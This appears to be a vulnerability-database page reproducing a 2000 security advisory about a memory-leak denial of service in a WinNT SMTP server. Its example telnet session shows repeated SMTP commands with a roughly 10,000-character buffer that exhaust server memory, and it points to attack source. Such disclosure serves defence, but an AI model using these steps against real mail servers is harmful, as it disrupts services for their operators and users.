Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

supermail.nt.txt

🗓️ 13 Jan 2000 00:00:00Reported by Underground Security Systems ResearchType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 30 Views

Local/Remote denial of service threat in Super Mail Transfer Package for WinNT due to memory leak.

Code
`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Local / Remote D.o.S Attack in Super Mail Transfer Package (SMTP)  
Server for WinNT Version 1.9x  
  
USSR Advisory Code: USSR-2000031  
  
Release Date:  
January 13, 2000  
  
Systems Affected:  
Nosque Workshop, Super Mail Transfer Package (PORT 25) Server for  
WinNT Version 1.9x and maybe  
other versions.  
  
THE PROBLEM  
A memory leak exists in the Super Mail Transfer Package that may  
cause an NT host to stop functioning and/or need to be rebooted.   
The memory leak may occur when you connect to the SMTP port,  
all information you send to the system will be stored in memory,  
and SMTP support multiples HELO/ MAIL FROM/ RCPT TO / DATA in the  
same connection.  
If you did multiple HELO/ MAIL FROM/ RCPT TO / DATA in the same  
connection the memory may not be deallocated. This condition may  
cause the computer to stop functioning the moment memory runs out.  
  
Example:  
[[email protected]$ telnet example.com 25  
Trying example.com...  
Connected to example.com.  
Escape character is '^]'.  
220 MachineNamet AttackerIp with SMTP for NT BD0198   
HELO CHEEF  
250 Hello, AtackerHostName AttackerIp  
mail to:<sssa.com>  
250 <sssa.com@localhost> ok  
rcpt to:<sssc.com>  
250 to:<sssc.com> ok  
Data  
354 Send Mail Message Body; End with <CR><LF>.<CR><LF>  
[buffer]  
(point)  
250 OK  
  
If you repeat this commands all information passed to the server will  
be stored in memory thus the memory leak problem,   
  
  
Where [buffer] is aprox. 10000 characters.  
  
Binary or source for this D.o.s:   
  
http://www.ussrback.com/  
  
Do you do the w00w00?  
This advisory also acts as part of w00giving. This is another  
contribution to w00giving for all you w00nderful people out there.  
You do know what w00giving is don't you?   
http://www.w00w00.org/advisories.html  
  
Vendor Status:  
Contacted.  
  
Vendor Url: http://www.web-net.com/supermail/   
Program Url: http://shareit1.element5.com/programs.html?nr=100364  
  
Credit: USSRLABS  
  
SOLUTION  
Vendor say:  
The related problems are fixed in the next generation of SMTP call  
MsgCore/NT.  
  
Greetings:  
EEye, Attrition, w00w00, beavuh, Rhino9, ADM, L0pht, HNN,  
Technotronic and Wiretrip.  
  
u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c  
h  
http://www.ussrback.com  
  
  
-----BEGIN PGP SIGNATURE-----  
Version: PGPfreeware 6.5.2 for non-commercial use <http://www.pgp.com>  
  
iQA/AwUBOH2LMNybEYfHhkiVEQKNHgCfU/XIbI+exgBeSUwMfqkyh0An2QQAoJnX  
y7JkO2Teh59DPBCDy4WmJ32z  
=oDT+  
-----END PGP SIGNATURE-----  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 Jan 2000 00:00Current
7.4High risk
Vulners AI Score7.4
denial of servicewinnt vulnerabilitymemory leaksmtp port issuesystem failure risk
30